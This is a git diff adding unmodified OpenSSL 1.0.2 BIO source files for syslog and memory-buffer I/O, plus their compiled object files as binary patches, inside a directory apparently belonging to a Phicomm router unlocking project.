diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_log.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_log.c
new file mode 100644
index 0000000..1283a52
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_log.c
@@ -0,0 +1,453 @@
+/* crypto/bio/bss_log.c */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Why BIO_s_log?
+ *
+ * BIO_s_log is useful for system daemons (or services under NT). It is
+ * one-way BIO, it sends all stuff to syslogd (on system that commonly use
+ * that), or event log (on NT), or OPCOM (on OpenVMS).
+ *
+ */
+
+#include <stdio.h>
+#include <errno.h>
+
+#include "cryptlib.h"
+
+#if defined(OPENSSL_SYS_WINCE)
+#elif defined(OPENSSL_SYS_WIN32)
+#elif defined(OPENSSL_SYS_VMS)
+# include <opcdef.h>
+# include <descrip.h>
+# include <lib$routines.h>
+# include <starlet.h>
+/* Some compiler options may mask the declaration of "_malloc32". */
+# if __INITIAL_POINTER_SIZE && defined _ANSI_C_SOURCE
+#  if __INITIAL_POINTER_SIZE == 64
+#   pragma pointer_size save
+#   pragma pointer_size 32
+void *_malloc32(__size_t);
+#   pragma pointer_size restore
+#  endif                        /* __INITIAL_POINTER_SIZE == 64 */
+# endif                         /* __INITIAL_POINTER_SIZE && defined
+                                 * _ANSI_C_SOURCE */
+#elif defined(__ultrix)
+# include <sys/syslog.h>
+#elif defined(OPENSSL_SYS_NETWARE)
+# define NO_SYSLOG
+#elif (!defined(MSDOS) || defined(WATT32)) && !defined(OPENSSL_SYS_VXWORKS) && !defined(NO_SYSLOG)
+# include <syslog.h>
+#endif
+
+#include <openssl/buffer.h>
+#include <openssl/err.h>
+
+#ifndef NO_SYSLOG
+
+# if defined(OPENSSL_SYS_WIN32)
+#  define LOG_EMERG       0
+#  define LOG_ALERT       1
+#  define LOG_CRIT        2
+#  define LOG_ERR         3
+#  define LOG_WARNING     4
+#  define LOG_NOTICE      5
+#  define LOG_INFO        6
+#  define LOG_DEBUG       7
+
+#  define LOG_DAEMON      (3<<3)
+# elif defined(OPENSSL_SYS_VMS)
+/* On VMS, we don't really care about these, but we need them to compile */
+#  define LOG_EMERG       0
+#  define LOG_ALERT       1
+#  define LOG_CRIT        2
+#  define LOG_ERR         3
+#  define LOG_WARNING     4
+#  define LOG_NOTICE      5
+#  define LOG_INFO        6
+#  define LOG_DEBUG       7
+
+#  define LOG_DAEMON      OPC$M_NM_NTWORK
+# endif
+
+static int MS_CALLBACK slg_write(BIO *h, const char *buf, int num);
+static int MS_CALLBACK slg_puts(BIO *h, const char *str);
+static long MS_CALLBACK slg_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int MS_CALLBACK slg_new(BIO *h);
+static int MS_CALLBACK slg_free(BIO *data);
+static void xopenlog(BIO *bp, char *name, int level);
+static void xsyslog(BIO *bp, int priority, const char *string);
+static void xcloselog(BIO *bp);
+
+static BIO_METHOD methods_slg = {
+    BIO_TYPE_MEM, "syslog",
+    slg_write,
+    NULL,
+    slg_puts,
+    NULL,
+    slg_ctrl,
+    slg_new,
+    slg_free,
+    NULL,
+};
+
+BIO_METHOD *BIO_s_log(void)
+{
+    return (&methods_slg);
+}
+
+static int MS_CALLBACK slg_new(BIO *bi)
+{
+    bi->init = 1;
+    bi->num = 0;
+    bi->ptr = NULL;
+    xopenlog(bi, "application", LOG_DAEMON);
+    return (1);
+}
+
+static int MS_CALLBACK slg_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    xcloselog(a);
+    return (1);
+}
+
+static int MS_CALLBACK slg_write(BIO *b, const char *in, int inl)
+{
+    int ret = inl;
+    char *buf;
+    char *pp;
+    int priority, i;
+    static const struct {
+        int strl;
+        char str[10];
+        int log_level;
+    } mapping[] = {
+        {
+            6, "PANIC ", LOG_EMERG
+        },
+        {
+            6, "EMERG ", LOG_EMERG
+        },
+        {
+            4, "EMR ", LOG_EMERG
+        },
+        {
+            6, "ALERT ", LOG_ALERT
+        },
+        {
+            4, "ALR ", LOG_ALERT
+        },
+        {
+            5, "CRIT ", LOG_CRIT
+        },
+        {
+            4, "CRI ", LOG_CRIT
+        },
+        {
+            6, "ERROR ", LOG_ERR
+        },
+        {
+            4, "ERR ", LOG_ERR
+        },
+        {
+            8, "WARNING ", LOG_WARNING
+        },
+        {
+            5, "WARN ", LOG_WARNING
+        },
+        {
+            4, "WAR ", LOG_WARNING
+        },
+        {
+            7, "NOTICE ", LOG_NOTICE
+        },
+        {
+            5, "NOTE ", LOG_NOTICE
+        },
+        {
+            4, "NOT ", LOG_NOTICE
+        },
+        {
+            5, "INFO ", LOG_INFO
+        },
+        {
+            4, "INF ", LOG_INFO
+        },
+        {
+            6, "DEBUG ", LOG_DEBUG
+        },
+        {
+            4, "DBG ", LOG_DEBUG
+        },
+        {
+            0, "", LOG_ERR
+        }
+        /* The default */
+    };
+
+    if ((buf = (char *)OPENSSL_malloc(inl + 1)) == NULL) {
+        return (0);
+    }
+    strncpy(buf, in, inl);
+    buf[inl] = '\0';
+
+    i = 0;
+    while (strncmp(buf, mapping[i].str, mapping[i].strl) != 0)
+        i++;
+    priority = mapping[i].log_level;
+    pp = buf + mapping[i].strl;
+
+    xsyslog(b, priority, pp);
+
+    OPENSSL_free(buf);
+    return (ret);
+}
+
+static long MS_CALLBACK slg_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    switch (cmd) {
+    case BIO_CTRL_SET:
+        xcloselog(b);
+        xopenlog(b, ptr, num);
+        break;
+    default:
+        break;
+    }
+    return (0);
+}
+
+static int MS_CALLBACK slg_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = slg_write(bp, str, n);
+    return (ret);
+}
+
+# if defined(OPENSSL_SYS_WIN32)
+
+static void xopenlog(BIO *bp, char *name, int level)
+{
+    if (check_winnt())
+        bp->ptr = RegisterEventSourceA(NULL, name);
+    else
+        bp->ptr = NULL;
+}
+
+static void xsyslog(BIO *bp, int priority, const char *string)
+{
+    LPCSTR lpszStrings[2];
+    WORD evtype = EVENTLOG_ERROR_TYPE;
+    char pidbuf[DECIMAL_SIZE(DWORD) + 4];
+
+    if (bp->ptr == NULL)
+        return;
+
+    switch (priority) {
+    case LOG_EMERG:
+    case LOG_ALERT:
+    case LOG_CRIT:
+    case LOG_ERR:
+        evtype = EVENTLOG_ERROR_TYPE;
+        break;
+    case LOG_WARNING:
+        evtype = EVENTLOG_WARNING_TYPE;
+        break;
+    case LOG_NOTICE:
+    case LOG_INFO:
+    case LOG_DEBUG:
+        evtype = EVENTLOG_INFORMATION_TYPE;
+        break;
+    default:
+        /*
+         * Should never happen, but set it
+         * as error anyway.
+         */
+        evtype = EVENTLOG_ERROR_TYPE;
+        break;
+    }
+
+    sprintf(pidbuf, "[%u] ", GetCurrentProcessId());
+    lpszStrings[0] = pidbuf;
+    lpszStrings[1] = string;
+
+    ReportEventA(bp->ptr, evtype, 0, 1024, NULL, 2, 0, lpszStrings, NULL);
+}
+
+static void xcloselog(BIO *bp)
+{
+    if (bp->ptr)
+        DeregisterEventSource((HANDLE) (bp->ptr));
+    bp->ptr = NULL;
+}
+
+# elif defined(OPENSSL_SYS_VMS)
+
+static int VMS_OPC_target = LOG_DAEMON;
+
+static void xopenlog(BIO *bp, char *name, int level)
+{
+    VMS_OPC_target = level;
+}
+
+static void xsyslog(BIO *bp, int priority, const char *string)
+{
+    struct dsc$descriptor_s opc_dsc;
+
+/* Arrange 32-bit pointer to opcdef buffer and malloc(), if needed. */
+#  if __INITIAL_POINTER_SIZE == 64
+#   pragma pointer_size save
+#   pragma pointer_size 32
+#   define OPCDEF_TYPE __char_ptr32
+#   define OPCDEF_MALLOC _malloc32
+#  else                         /* __INITIAL_POINTER_SIZE == 64 */
+#   define OPCDEF_TYPE char *
+#   define OPCDEF_MALLOC OPENSSL_malloc
+#  endif                        /* __INITIAL_POINTER_SIZE == 64 [else] */
+
+    struct opcdef *opcdef_p;
+
+#  if __INITIAL_POINTER_SIZE == 64
+#   pragma pointer_size restore
+#  endif                        /* __INITIAL_POINTER_SIZE == 64 */
+
+    char buf[10240];
+    unsigned int len;
+    struct dsc$descriptor_s buf_dsc;
+    $DESCRIPTOR(fao_cmd, "!AZ: !AZ");
+    char *priority_tag;
+
+    switch (priority) {
+    case LOG_EMERG:
+        priority_tag = "Emergency";
+        break;
+    case LOG_ALERT:
+        priority_tag = "Alert";
+        break;
+    case LOG_CRIT:
+        priority_tag = "Critical";
+        break;
+    case LOG_ERR:
+        priority_tag = "Error";
+        break;
+    case LOG_WARNING:
+        priority_tag = "Warning";
+        break;
+    case LOG_NOTICE:
+        priority_tag = "Notice";
+        break;
+    case LOG_INFO:
+        priority_tag = "Info";
+        break;
+    case LOG_DEBUG:
+        priority_tag = "DEBUG";
+        break;
+    }
+
+    buf_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+    buf_dsc.dsc$b_class = DSC$K_CLASS_S;
+    buf_dsc.dsc$a_pointer = buf;
+    buf_dsc.dsc$w_length = sizeof(buf) - 1;
+
+    lib$sys_fao(&fao_cmd, &len, &buf_dsc, priority_tag, string);
+
+    /* We know there's an 8-byte header.  That's documented. */
+    opcdef_p = OPCDEF_MALLOC(8 + len);
+    opcdef_p->opc$b_ms_type = OPC$_RQ_RQST;
+    memcpy(opcdef_p->opc$z_ms_target_classes, &VMS_OPC_target, 3);
+    opcdef_p->opc$l_ms_rqstid = 0;
+    memcpy(&opcdef_p->opc$l_ms_text, buf, len);
+
+    opc_dsc.dsc$b_dtype = DSC$K_DTYPE_T;
+    opc_dsc.dsc$b_class = DSC$K_CLASS_S;
+    opc_dsc.dsc$a_pointer = (OPCDEF_TYPE) opcdef_p;
+    opc_dsc.dsc$w_length = len + 8;
+
+    sys$sndopr(opc_dsc, 0);
+
+    OPENSSL_free(opcdef_p);
+}
+
+static void xcloselog(BIO *bp)
+{
+}
+
+# else                          /* Unix/Watt32 */
+
+static void xopenlog(BIO *bp, char *name, int level)
+{
+#  ifdef WATT32                 /* djgpp/DOS */
+    openlog(name, LOG_PID | LOG_CONS | LOG_NDELAY, level);
+#  else
+    openlog(name, LOG_PID | LOG_CONS, level);
+#  endif
+}
+
+static void xsyslog(BIO *bp, int priority, const char *string)
+{
+    syslog(priority, "%s", string);
+}
+
+static void xcloselog(BIO *bp)
+{
+    closelog();
+}
+
+# endif                         /* Unix */
+
+#endif                          /* NO_SYSLOG */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_log.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_log.o
new file mode 100644
index 0000000000000000000000000000000000000000..3aae2a8704ac855c7973fc38470ace1aa4817717
GIT binary patch
literal 4064
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
TRMV_|o4O#+EVgt5fBSy{*DK>I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_mem.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_mem.c
new file mode 100644
index 0000000..d190765
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_mem.c
@@ -0,0 +1,311 @@
+/* crypto/bio/bss_mem.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+static int mem_write(BIO *h, const char *buf, int num);
+static int mem_read(BIO *h, char *buf, int size);
+static int mem_puts(BIO *h, const char *str);
+static int mem_gets(BIO *h, char *str, int size);
+static long mem_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int mem_new(BIO *h);
+static int mem_free(BIO *data);
+static BIO_METHOD mem_method = {
+    BIO_TYPE_MEM,
+    "memory buffer",
+    mem_write,
+    mem_read,
+    mem_puts,
+    mem_gets,
+    mem_ctrl,
+    mem_new,
+    mem_free,
+    NULL,
+};
+
+/*
+ * bio->num is used to hold the value to return on 'empty', if it is 0,
+ * should_retry is not set
+ */
+
+BIO_METHOD *BIO_s_mem(void)
+{
+    return (&mem_method);
+}
+
+BIO *BIO_new_mem_buf(void *buf, int len)
+{
+    BIO *ret;
+    BUF_MEM *b;
+    size_t sz;
+
+    if (!buf) {
+        BIOerr(BIO_F_BIO_NEW_MEM_BUF, BIO_R_NULL_PARAMETER);
+        return NULL;
+    }
+    sz = (len < 0) ? strlen(buf) : (size_t)len;
+    if (!(ret = BIO_new(BIO_s_mem())))
+        return NULL;
+    b = (BUF_MEM *)ret->ptr;
+    b->data = buf;
+    b->length = sz;
+    b->max = sz;
+    ret->flags |= BIO_FLAGS_MEM_RDONLY;
+    /* Since this is static data retrying wont help */
+    ret->num = 0;
+    return ret;
+}
+
+static int mem_new(BIO *bi)
+{
+    BUF_MEM *b;
+
+    if ((b = BUF_MEM_new()) == NULL)
+        return (0);
+    bi->shutdown = 1;
+    bi->init = 1;
+    bi->num = -1;
+    bi->ptr = (char *)b;
+    return (1);
+}
+
+static int mem_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->shutdown) {
+        if ((a->init) && (a->ptr != NULL)) {
+            BUF_MEM *b;
+            b = (BUF_MEM *)a->ptr;
+            if (a->flags & BIO_FLAGS_MEM_RDONLY)
+                b->data = NULL;
+            BUF_MEM_free(b);
+            a->ptr = NULL;
+        }
+    }
+    return (1);
+}
+
+static int mem_read(BIO *b, char *out, int outl)
+{
+    int ret = -1;
+    BUF_MEM *bm;
+
+    bm = (BUF_MEM *)b->ptr;
+    BIO_clear_retry_flags(b);
+    ret = (outl >= 0 && (size_t)outl > bm->length) ? (int)bm->length : outl;
+    if ((out != NULL) && (ret > 0)) {
+        memcpy(out, bm->data, ret);
+        bm->length -= ret;
+        if (b->flags & BIO_FLAGS_MEM_RDONLY)
+            bm->data += ret;
+        else {
+            memmove(&(bm->data[0]), &(bm->data[ret]), bm->length);
+        }
+    } else if (bm->length == 0) {
+        ret = b->num;
+        if (ret != 0)
+            BIO_set_retry_read(b);
+    }
+    return (ret);
+}
+
+static int mem_write(BIO *b, const char *in, int inl)
+{
+    int ret = -1;
+    int blen;
+    BUF_MEM *bm;
+
+    bm = (BUF_MEM *)b->ptr;
+    if (in == NULL) {
+        BIOerr(BIO_F_MEM_WRITE, BIO_R_NULL_PARAMETER);
+        goto end;
+    }
+
+    if (b->flags & BIO_FLAGS_MEM_RDONLY) {
+        BIOerr(BIO_F_MEM_WRITE, BIO_R_WRITE_TO_READ_ONLY_BIO);
+        goto end;
+    }
+
+    BIO_clear_retry_flags(b);
+    blen = bm->length;
+    if (BUF_MEM_grow_clean(bm, blen + inl) != (blen + inl))
+        goto end;
+    memcpy(&(bm->data[blen]), in, inl);
+    ret = inl;
+ end:
+    return (ret);
+}
+
+static long mem_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+    char **pptr;
+
+    BUF_MEM *bm = (BUF_MEM *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        if (bm->data != NULL) {
+            /* For read only case reset to the start again */
+            if (b->flags & BIO_FLAGS_MEM_RDONLY) {
+                bm->data -= bm->max - bm->length;
+                bm->length = bm->max;
+            } else {
+                memset(bm->data, 0, bm->max);
+                bm->length = 0;
+            }
+        }
+        break;
+    case BIO_CTRL_EOF:
+        ret = (long)(bm->length == 0);
+        break;
+    case BIO_C_SET_BUF_MEM_EOF_RETURN:
+        b->num = (int)num;
+        break;
+    case BIO_CTRL_INFO:
+        ret = (long)bm->length;
+        if (ptr != NULL) {
+            pptr = (char **)ptr;
+            *pptr = (char *)&(bm->data[0]);
+        }
+        break;
+    case BIO_C_SET_BUF_MEM:
+        mem_free(b);
+        b->shutdown = (int)num;
+        b->ptr = ptr;
+        break;
+    case BIO_C_GET_BUF_MEM_PTR:
+        if (ptr != NULL) {
+            pptr = (char **)ptr;
+            *pptr = (char *)bm;
+        }
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = (long)b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+
+    case BIO_CTRL_WPENDING:
+        ret = 0L;
+        break;
+    case BIO_CTRL_PENDING:
+        ret = (long)bm->length;
+        break;
+    case BIO_CTRL_DUP:
+    case BIO_CTRL_FLUSH:
+        ret = 1;
+        break;
+    case BIO_CTRL_PUSH:
+    case BIO_CTRL_POP:
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int mem_gets(BIO *bp, char *buf, int size)
+{
+    int i, j;
+    int ret = -1;
+    char *p;
+    BUF_MEM *bm = (BUF_MEM *)bp->ptr;
+
+    BIO_clear_retry_flags(bp);
+    j = bm->length;
+    if ((size - 1) < j)
+        j = size - 1;
+    if (j <= 0) {
+        *buf = '\0';
+        return 0;
+    }
+    p = bm->data;
+    for (i = 0; i < j; i++) {
+        if (p[i] == '\n') {
+            i++;
+            break;
+        }
+    }
+
+    /*
+     * i is now the max num of bytes to copy, either j or up to
+     * and including the first newline
+     */
+
+    i = mem_read(bp, buf, i);
+    if (i > 0)
+        buf[i] = '\0';
+    ret = i;
+    return (ret);
+}
+
+static int mem_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = mem_write(bp, str, n);
+    /* memory semantics is that it will always work */
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_mem.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_mem.o
new file mode 100644
index 0000000000000000000000000000000000000000..ea7246951a9c1a233f9de1a0b6028cc6d45d65b3
GIT binary patch
literal 4944
zcmb`LZ)_Y#6~O2IBtFt)?^>7EG;X;dQ(ctyxN8EnA%t7|&No|K8YlKa6BAD7%i5u_
zeP(YDC$zOGt4p<7pQ)fK6%taA@~I#AP`*TkrmMKbN+~Ffg2JcDNJUDxlnN}|ss$hK
z&CZ<HTU!FblV)e;H}Ac9^Y_M{&E)$1J|7X{BL~P@O;AFvN^9j5E2hX@<W902e&C})
zYJPkZSte=Inyr79zKSj|QL`^0UvNr;9gBUjCP><}hZoRL&MW3WE`~u*9+J)Ld20S^
z@G!Ls3CCOQ-P1d$6;MjoY0sr}IJ<PP_MYCIsl7Y1ms*uj+Wb?_d|xTOv3#Cd?R57g
zYPPRrcKP+K)Ylhk?4j0EAzI(p#+)@esqqz3y(ev{G4P=8xcDg+-utZeSlV0~J}!S#
zKF;G}@xZv2S#;F69m!ec1T~-T3NZu4$`EQnO|B1hHPbyy&-l$twQI9&mjfheH})!4
zHN=Mf{inA!x5=ihZ=+4SPMbY%&fZR&5b8TOKU!@zYxYbVEnU4FY$w!sBQo3y0cWzQ
zrv{DLPME}xnJ@hd#%u@CcT;ONfvwS%J{WC?E@ne87QzCfi+u^KFoWR*XE;L&o7~^w
zLglP%!dTrt`(V<pt%T=o&~5(SSiK|s+%KU>>z{@%p{3v})OYnjbIDk(=+8X6`U8M^
z!C2M8wK*u>Jj#}_)Je@#iN+TdYrq*TtzFZ<qgXVul7+~^boZM|AflKd#T*DVo`5l#
zH<n*k7O@K_!bV@xR*Y^Ee!*^Zn}e~&EyW_Vc17QVKB;+U<8#jL0o0K*eT{Zn%62w(
zq|LF;#%rM4@F#6tIcK0>m-F&aevqwIZKb*$He~Y3s}<<2;e@o)Au~WOR^jt{6h3U?
z8vCi(i{^Dk6ze#F4VJ0z>r_fB49Pv0t9R4Vf)dDtl+s(&{3|sVm(MqXvhh}P7&Z~x
zL-My+G>Z8lHLf(N`9aeD`!90lBK_cPT0h*pbr>cOw?D0Kf!+yI&cnv9HLLfpMSKy1
zT#FBORTj<%Exl7)ITJ?5=#{xV+NAZbq9+z3p1}L5H2}NyNtnU=sCg{%ER7OBA&aRP
zsvR3XzJU3EBNOUGSvwOQsg91Sn#<4^bXEQz#cW^Sm!q-#NOe-LMtkCW<B5lpk5*YV
zIrB&&p4hkB!A@t`eFPHDWcKkqj?zXJfP`|llM&zdju7AJh;Qfiw$Sr%A9Vol<ZV5e
zXQYVXuSg*%?t|2g4CE#J^h=St|1qg!E|8X@XM<@eW^9qAgug1q0LW5DuN3K(LJxuJ
z6zYQ*_+fUv+|CH*z(jTFV+`j|4<yGv7{iPdk{1Xr)UT0&+`<p|n)9cnj<Xnp5%k}X
